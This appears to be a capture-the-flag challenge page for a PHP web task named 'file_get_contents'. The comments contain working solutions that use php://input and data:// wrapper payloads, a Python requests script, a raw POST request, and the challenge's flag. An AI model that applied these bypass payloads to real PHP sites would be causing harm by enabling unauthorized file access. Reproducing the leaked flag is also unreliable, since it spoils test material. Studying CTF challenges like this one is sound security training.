file_get_contentsWEB 未解决
分数:
30
金币:
3
题目作者:
harry
一 血:
npfs
一血奖励:
2金币
解 决:
5218
提 示:
描 述:
file_get_contents????
评分(7)
解题动态
nwnmc 攻破了该题 9小时前
yokoi 攻破了该题 10小时前
薄言. 攻破了该题 11小时前
baizhi白栀 攻破了该题 15小时前
huopt 攻破了该题 16小时前
fish12139 攻破了该题 2天前
店晓贰 攻破了该题 2天前
kkctf 攻破了该题 3天前
15922111842 攻破了该题 3天前
Ylanz 攻破了该题 3天前
momo666 攻破了该题 4天前
bctivy99 攻破了该题 4天前
sectmp 攻破了该题 4天前
WWls= 攻破了该题 4天前
asdliuyan 攻破了该题 4天前
平静的子弹 攻破了该题 5天前
liaty 攻破了该题 5天前
小丽 攻破了该题 5天前
怎么都吃不饱 攻破了该题 5天前
评论
bbggddaa 1年前
举报
https://blog.csdn.net/silence1_/article/details/90241302
LLTVLL 1年前
举报
?ac=123&fn=php://input,hackbar中post参数1
2324291123 2年前
举报
import requests url='http://114.67.175.224:15234/' url = url + '?ac=f&fn=php://input' data={'f'} re=requests.post(url, data) print(type(re)) print(re.text)
一路奔腾 2年前
举报
file_get_contents函数绕过,可以参考https://www.pianshen.com/article/24421724508/
steve07222 2年前
举报
http://114.67.175.224:18454/?ac=1&fn=data://text/plain,1
wxy1343 3年前
举报
http://114.67.175.224:15664/?ac=1&fn=data:,1
wxy1343 3年前
举报
flag{6fccd47ef5e5988f1e2c4989bf554614}
你比大葱更美丽 3年前
举报
用php://input的话post传参hackbar好像不行,我是用burp抓包传的才行的
turriT0Psis 1年前
举报
谢谢,我试了好久都不行,多亏受到您的点拨
Striker123456 3年前
举报
简简单单的变量覆盖
Striker123456 3年前
举报
@J_0k3r 没有extract的$fn就不可控了
J_0k3r 3年前
举报
不是文件包含吗QAQ,跟变量覆盖有什么关系
zdfy005 3年前
举报
POST /?ac=flag&fn=php://input HTTP/1.1 删除Content-Type: POST flag